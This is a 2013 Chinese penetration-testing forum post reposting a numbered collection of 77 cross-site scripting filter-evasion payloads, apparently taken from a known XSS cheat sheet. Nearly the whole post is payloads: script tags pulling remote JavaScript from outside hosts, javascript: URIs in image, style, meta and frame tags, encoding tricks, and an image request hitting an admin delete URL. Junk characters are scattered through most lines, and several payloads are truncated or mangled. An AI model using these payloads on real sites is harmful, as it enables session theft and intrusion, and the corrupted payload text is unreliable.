中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。6 _3 U" p* b" O, t
(1)普通的XSS JavaScript注入
' y& w, s  `8 j, Y7 Z( Q' z3 z7 E; Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 h2 y$ d* N0 V$ J
(2)IMG标签XSS使用JavaScript命令2 D/ K- n1 e0 a& m' ?/ B' H) o8 T
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ E6 j8 t- W$ p: \
(3)IMG标签无分号无引号
. J5 Y- e5 k- _* ]<IMG SRC=javascript:alert(‘XSS’)>
3 M: c% S  g5 C( U(4)IMG标签大小写不敏感9 S1 b( L6 r& S# M5 t( f
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 l9 S7 p$ I. e" A- |' c, ~(5)HTML编码(必须有分号)
1 h- k( `' g# W; e8 ^  C; ?) e<IMG SRC=javascript:alert(“XSS”)>" R& U! A) [8 {1 _! s- v7 N
(6)修正缺陷IMG标签
# g  M4 J0 C1 R$ ?" |' X3 U& z* y  U<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>8 K3 P2 c" B, u& ~. A; {" H) L

; |8 k* W5 M$ A/ ~4 b: A$ g  c1 z: u& M: y, |' L
(7)formCharCode标签(计算器)1 C7 r1 a( t& d
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>1 h! X; ^2 `# N! \4 R! b
(8)UTF-8的Unicode编码(计算器)4 {( o: ~$ ]. d8 I" t% _8 n" {
<IMG SRC=jav..省略..S')>+ u% _% V% o/ d  r; k0 k  e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 d( T# W* D9 N& M0 j* f% [<IMG SRC=jav..省略..S')>
4 t7 p- P- F- S9 B(10)十六进制编码也是没有分号(计算器)
7 g3 L$ o7 S- B* G/ B  E4 }) B<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>* ]' J0 m( h8 T. d1 w* m
(11)嵌入式标签,将Javascript分开
$ }+ W2 C; H2 Z8 _<IMG SRC=”jav ascript:alert(‘XSS’);”>/ b) I* m0 R( d, `5 w4 c
(12)嵌入式编码标签,将Javascript分开( U+ e; a$ q8 [5 d; |; N4 X
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 i5 \: @* a" g( a9 l0 P& Z" y
(13)嵌入式换行符
: P) w2 x$ C; f<IMG SRC=”jav ascript:alert(‘XSS’);”>! w+ Y1 Z; u9 [+ e/ _3 T
(14)嵌入式回车
5 q: L! d. t' }" M& i<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 m0 e. k( S5 |  c(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 n# |0 i0 d; N<IMG SRC=”javascript:alert(‘XSS‘)”>. f3 z5 ^: G, W5 X. @
(16)解决限制字符(要求同页面)7 X% W, ~# h" n% y4 i0 _
<script>z=’document.’</script>9 z# M! H. F% I( R
<script>z=z+’write(“‘</script>, ]- Z7 }- L8 w: Y5 @* V! C
<script>z=z+’<script’</script>- S( B& x" _7 O$ [. b
<script>z=z+’ src=ht’</script>& v3 A5 S% h" O
<script>z=z+’tp://ww’</script>2 O! }0 l: L8 t" J" U% s' r
<script>z=z+’w.shell’</script>
* X4 U* J2 z2 r) |# q; u<script>z=z+’.net/1.’</script>: A( L1 I" b' b7 o" ?. {
<script>z=z+’js></sc’</script>
8 t. U7 ?1 p5 R: Q, {- L1 w7 b: j<script>z=z+’ript>”)’</script>
7 g- j3 G3 \8 {) x  Q<script>eval_r(z)</script>
# |+ o- W/ Y! E6 U# {(17)空字符12-7-1 T00LS - Powered by Discuz! Board3 Q, u( \3 w7 I
https://www.t00ls.net/viewthread ... table&tid=15267 2/62 e2 y2 \5 T  Z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" |& N4 y: j. i5 @(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 K4 H7 ?. f9 ]/ {2 c
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 u4 w2 x# `( M5 Z$ Z  U8 A(19)Spaces和meta前的IMG标签* `3 ~0 `4 E' p3 k# k
<IMG SRC=” javascript:alert(‘XSS’);”>8 g- O" q* a9 e' e" v! ^
(20)Non-alpha-non-digit XSS# \. \- l/ x6 z* H) A/ k7 W+ M' f
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, A5 s0 V, k% ]* I# Y
(21)Non-alpha-non-digit XSS to 2  C1 |+ d5 Q* d7 U# n6 f3 N
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. z# {' x8 M: a(22)Non-alpha-non-digit XSS to 3
, ]; G) x4 N; V$ b: y6 W0 o<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' K: R- n7 A, ?; E(23)双开括号
" }% k) a6 \& v; G& L$ S  q8 f, h<<SCRIPT>alert(“XSS”);//<</SCRIPT>& k& j: F4 h( E
(24)无结束脚本标记(仅火狐等浏览器)& |6 R4 O  ?- r3 V
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: w  @( a5 n. c0 {$ K
(25)无结束脚本标记2, P2 J: N( i) b) Y* }
<SCRIPT SRC=//3w.org/XSS/xss.js>
: C$ U- e; e4 x  K0 Q(26)半开的HTML/JavaScript XSS
3 j: ~, a  P/ n8 x) d<IMG SRC=”javascript:alert(‘XSS’)”& }3 e0 R  A/ o
(27)双开角括号( f' X  C2 [1 S$ [2 P- Q
<iframe src=http://3w.org/XSS.html <- N' W* H' L7 N  N. [- D
(28)无单引号 双引号 分号7 Z5 k( G7 T! n; U. Z9 a& o
<SCRIPT>a=/XSS/
# l! F8 x8 x- j" J$ W! Falert(a.source)</SCRIPT>
" H3 M, A* f* o3 W(29)换码过滤的JavaScript' D; Y; _) N' r  X9 B; f+ `% j% v$ b
\”;alert(‘XSS’);//
$ E* ~& C: r! u(30)结束Title标签
# a$ o0 F4 S, L: E8 v& s) A</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! I3 w; X& ]7 J' F! K' z
(31)Input Image, k9 L' r8 R& r( N; r2 \% G
<INPUT SRC=”javascript:alert(‘XSS’);”>
- }2 q7 J+ u8 p5 _1 `(32)BODY Image, q# t! G( R+ z- p9 G4 B" q  P
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- Y" `( H* ~$ R(33)BODY标签
( L/ u" M3 K$ m$ K+ @" K<BODY(‘XSS’)>2 l! c0 ?5 _2 p: i6 o3 W
(34)IMG Dynsrc
( A( r% S( q2 i$ ]1 S0 f<IMG DYNSRC=”javascript:alert(‘XSS’)”>! d9 O+ R1 k# `, }  P7 M+ o. m
(35)IMG Lowsrc; o) f, Q' @8 P6 X% `' A
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. ?( M6 G" E- D+ t1 c  p
(36)BGSOUND+ p. Q1 |" q. P. H- ^
<BGSOUND SRC=”javascript:alert(‘XSS’);”>$ O3 u% q/ T! K. O7 Y1 o: B, P3 a
(37)STYLE sheet8 G1 o, b* ?. b7 S) B' l# M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- |- k8 s9 B( A! X" W- U5 n4 A(38)远程样式表
& F- n" d6 J" X' ]<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: }0 x- E0 n# `* r8 b/ f+ N(39)List-style-image(列表式)
( d7 @( G, ~) u+ V<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, i) C# N+ ^4 U4 p0 ~8 I(40)IMG VBscript
: W( Q. `7 [- O) }2 H+ a<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: x/ ]& P) M- e9 |. K. m3 H/ A(41)META链接url
" j7 Q( m. a* o$ Z% ?$ M6 F6 {$ A, [, P
' ~3 q6 u* k% g4 N5 ]* M
<META HTTP-EQUIV=”refresh” CONTENT=”0;/ H, ]% Z5 i& Z# }; G' l+ q! x
URL=http://;URL=javascript:alert(‘XSS’);”>
3 `6 o2 Z2 o, m( b- M, V# n(42)Iframe
$ Q0 M5 }+ u$ G<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 W/ G4 t+ a5 [3 A% T. C(43)Frame
; G5 v5 d0 _9 @& o- e+ A- W" @: c<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 F- A( B, a' E; P5 n6 uhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6' y/ G$ {) q" _2 R3 n0 A
(44)Table1 U8 E8 F. ?9 A3 A+ J1 U8 S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& A& z. I7 ^0 P; X7 M(45)TD0 Z) ?% u+ b6 ?8 Y; w6 c
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 c* Q) K5 M1 c0 Y(46)DIV background-image
9 T5 v9 u" `5 @- f3 w: h/ o  e7 y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ E4 h3 @- p" m: I- p4 A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-3 O" v1 N( g' z3 f: |
8&13&12288&65279)
! ^% q1 l) ?1 x5 c<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- X7 a$ c) A$ P9 B6 c* l$ ~7 _; n
(48)DIV expression% w# R9 \8 `  Z, y  B' _8 }/ |) \
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" S1 ?8 w0 K/ k$ Z- V, C(49)STYLE属性分拆表达
' O0 y6 q  k2 H6 T9 Z3 Y6 u<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ W; o3 _0 D+ S$ l(50)匿名STYLE(组成:开角号和一个字母开头)
8 e+ `7 N- c: ~+ z+ x! [, @+ E, r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ Q. Y, ^4 t0 e% P( d- K6 ?. |
(51)STYLE background-image
/ T( g# ?: ]  j! v$ G<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A# s6 q0 w9 D  J( i. `/ m/ F( @
CLASS=XSS></A>+ _% K- j9 l4 J( P. J( T! S9 J) P$ I1 e! K
(52)IMG STYLE方式  w/ m9 C. q! x6 F2 q
exppression(alert(“XSS”))’>4 Z% m0 O0 w" g3 b0 m
(53)STYLE background2 ?( z, U: k4 h6 `. `
<STYLE><STYLE9 K' G& \4 J' M6 P3 T. G
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: ^) F  H8 ~# j8 M5 C5 v
(54)BASE! B* x5 Z" _3 O4 b$ n8 e; u, E
<BASE HREF=”javascript:alert(‘XSS’);//”>
0 z' G7 y0 `' X  a5 x1 G; s1 _(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* ~9 C6 y& q6 y1 M- ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ H5 i. |7 O* `/ h+ w3 U: T
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 \* e4 r0 l) ia=”get”;3 y& z* [% ^' R5 W1 H
b=”URL(\”";/ u" ^/ }! x3 s0 ]6 c2 [
c=”javascript:”;- _% t4 G0 q3 P. R5 q
d=”alert(‘XSS’);\”)”;
0 {& `* q) [3 T6 Q  g7 ?, ^$ Z+ }eval_r(a+b+c+d);& e# L# N' e+ b0 K
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上" i2 m& w& |" i
<HTML xmlns:xss>/ Y- O6 @1 b  i" }' Y2 Y! }
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ E4 @8 f' {1 a$ s8 W<xss:xss>XSS</xss:xss>
! H. q: {* l* h& F9 K</HTML>
- G" K) F* A2 }4 a3 L# B2 d1 ]  |(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; C. N9 O+ P! D<SCRIPT SRC=””></SCRIPT>
. y, B6 ^" l) u- b4 Q' [" D(59)IMG嵌入式命令,可执行任意命令9 @$ k) s# D1 g! v0 \: {' p
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
) P$ E8 c9 D& M. V9 g% e* Q( D: O0 s(60)IMG嵌入式命令(a.jpg在同服务器)& e, P, j0 N0 e; i1 D; b
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% a; G2 y4 @% b; f  b
(61)绕符号过滤
* `) k! u4 ^- w$ O<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, d6 b* s$ {- w(62)
1 w5 m0 R/ D5 I* |8 Y4 |: a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. n3 p3 W. P  x( E+ z(63), C. m4 }9 T1 i6 m! n- b
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
% u' d# G: j  {$ v" P6 W4 \3 m3 q/ [- i1 }(64)5 B; ?- O! Q8 q6 C, Q* L& K4 Y5 c
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>6 h4 P. `; d) t; J+ ?2 p+ N: o
(65)
8 P7 n! p  I9 t& y<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>) w) @# {+ e! q+ K7 L7 C# b
(66)12-7-1 T00LS - Powered by Discuz! Board* d+ L# y& b2 g4 f7 Y0 Z
https://www.t00ls.net/viewthread ... table&tid=15267 4/6+ Q% }9 }; _% u7 T1 X
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ {2 J+ U5 P, H+ b/ ]9 S( E2 T- l(67), q$ S% q% ~6 n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
/ F+ Q) E& A% }6 n</SCRIPT>7 A5 s/ [; \8 ~" C: t0 P+ u
(68)URL绕行
9 J7 C6 ~! o1 D9 {$ y<A HREF=”http://127.0.0.1/”>XSS</A># H5 S% u+ M0 c. c. o
(69)URL编码
( f: U# \4 L, r0 D3 j2 ?<A HREF=”http://3w.org”>XSS</A>
- s+ J; F. }% T5 h) B6 Z(70)IP十进制
$ S4 a+ K$ p. T. O; ~6 b( s<A HREF=”http://3232235521″>XSS</A>& r4 e  Y! ~6 E3 G8 |
(71)IP十六进制. k- z: c/ ?7 w2 |5 [& Q# ]2 G  n
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 h& x$ H( M7 }% B+ D" h(72)IP八进制
3 h, p: ?0 t1 B<A HREF=”http://0300.0250.0000.0001″>XSS</A>
- _8 ^% I! j, r" C, X(73)混合编码
. d9 {4 K( ?5 `1 k  t1 c' p- a<A HREF=”h, Z& {2 V) o2 M9 P2 l5 m8 p
tt p://6 6.000146.0×7.147/”">XSS</A>4 D. C* c6 D4 A& W, `( x& U
(74)节省[http:]
' ?" E3 Q" I2 p2 B1 C- J3 m<A HREF=”//www.google.com/”>XSS</A>* r, w* M1 e2 D, r. j& M$ g+ T0 a
(75)节省[www]  A9 D( E/ m" h  B
<A HREF=”http://google.com/”>XSS</A>1 }6 t1 }+ s9 U, k' D* D$ |; e
(76)绝对点绝对DNS
" p" ?2 G5 }$ ^% s  f4 C  t<A HREF=”http://www.google.com./”>XSS</A>* V% m3 M4 \8 V. q4 Y% ?( O
(77)javascript链接3 H7 C7 T/ n% l0 u
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>8 T$ n2 b" r& r! b  k

0 X, b# p  j/ A1 k0 f/ G% |原文地址:http://fuzzexp.org/u/0day/?p=14
: L9 S! v, F$ G5 X7 `
) a9 ~6 T$ @2 f% E! H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2